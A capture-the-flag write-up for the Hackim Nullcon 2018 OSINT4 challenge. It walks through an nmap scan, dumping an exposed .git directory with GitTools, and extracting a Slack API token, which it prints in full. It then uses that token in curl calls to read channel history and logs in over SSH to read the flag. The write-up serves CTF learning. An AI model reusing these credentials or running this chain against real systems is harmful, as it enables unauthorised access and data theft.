Hackim Nullcon CTF – OSINT4

Hackim Nullcon CTF – OSINT4

ID-10-T Team

 

 

In this challenge they give us an ip address and we have to exploit a configuration flaw, to return the control to the legitimate owners. The first thing, scan the ports for this IP address:

 

nmap -sS 54.85.105.103

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-11 13:08 EST
Nmap scan report for ec2-54-85-105-103.compute-1.amazonaws.com (54.85.105.103)
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

 

We try to connect via HTTP:

 

The next is discover web content, for example, with burp intruder:

 

 

We have a git directory. Let’s download and analysis with GitTools:

Dump:

$ ./gitdumper.sh http://54.85.105.103/.git/ dump/
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating dump//.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[-] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[+] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[+] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[+] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/ac/fc9dc1aeb220fc298129e361657dcf29f9ca73
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/7c/3b9ebe9efb7c7a107dd50cfcea5a45294a5e21
[+] Downloaded: objects/e7/62de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Downloaded: objects/69/070f481086429a5171eee0db344c6e5f763180
[+] Downloaded: objects/f4/dbd1e4160988fc21955029e43a07c29e647461
[+] Downloaded: objects/0d/63125df015d371b7cbddc3ab41afa517784ca0
[+] Downloaded: objects/08/c42890845313fe6ce1cba1d8724d894a616c58
[+] Downloaded: objects/0f/250d442daaaf05714ddb312d39df823f0abef7
[+] Downloaded: objects/2b/5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Downloaded: objects/14/552d0244d9d36bd862bd3af58b9424d05a145a

 

Extract:

$ ./extractor.sh ../Dumper/dump/ dump_extract/
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1
[+] Found file: /GitTools/Extractor/dump_extract/0-2b5c11fb5d58e3e2834fca06ac41b997aaceb3c1/README.md
[+] Found commit: 0d63125df015d371b7cbddc3ab41afa517784ca0
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/README.md
[+] Found file: /GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config
[+] Found commit: e762de10c5cc16a55ab62ce2e86ea7cedee37119
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/README.md
[+] Found file: /GitTools/Extractor/dump_extract/2-e762de10c5cc16a55ab62ce2e86ea7cedee37119/Slack Config
[+] Found commit: acfc9dc1aeb220fc298129e361657dcf29f9ca73
[+] Found file: /GitTools/Extractor/dump_extract/3-acfc9dc1aeb220fc298129e361657dcf29f9ca73/README.md

 

We see the «Slack Config»:

$cat "/GitTools/Extractor/dump_extract/1-0d63125df015d371b7cbddc3ab41afa517784ca0/Slack Config"
Organisation Slack
https://corpnull.slack.com

Slack Token: xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5

We have a Slack token, let’s play with Slack API. List channels:

$curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' -H 'Content-type: application/x-www-form-urlencoded' https://slack.com/api/channels.list

 

The most interesting channel is «C8Y41NDEJ»:

 

Next, we view the conversations in this channel:

$curl -H 'Authorization: Bearer xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5' -H 'Content-type: application/x-www-form-urlencoded' "https://slack.com/api/chanhistory?token=xoxp-302709175073-304111796230-302748987361-6d10dcd6f4cedc60900986def747f0e5&channel=C8Y41NDEJ"

 

 

In slack chat we found a RSA private key and username that we use for connect to ssh server:

$ ssh mikeatcorp@54.85.105.103
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-1047-aws x86_64)

* Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

Get cloud support with Ubuntu Advantage Cloud Guest:
 http://www.ubuntu.com/business/services/cloud

24 packages can be updated.
0 updates are security updates.


*** System restart required ***
Last login: Sun Feb 11 11:16:33 2018 from

mikeatcorp@ip-172-30-1-179:~$ locate flag.txt
/secret/.supersecret/flag.txt
mikeatcorp@ip-172-30-1-179:~$ cat /secret/.supersecret/flag.txt
hackim18{'455676878965435365788698546'}
mikeatcorp@ip-172-30-1-179:~$

 

Flag: hackim18{‘455676878965435365788698546’}

Thanks to DanitorwS for solve some problem with this challenge.

Cheers.

 

Los comentarios están cerrados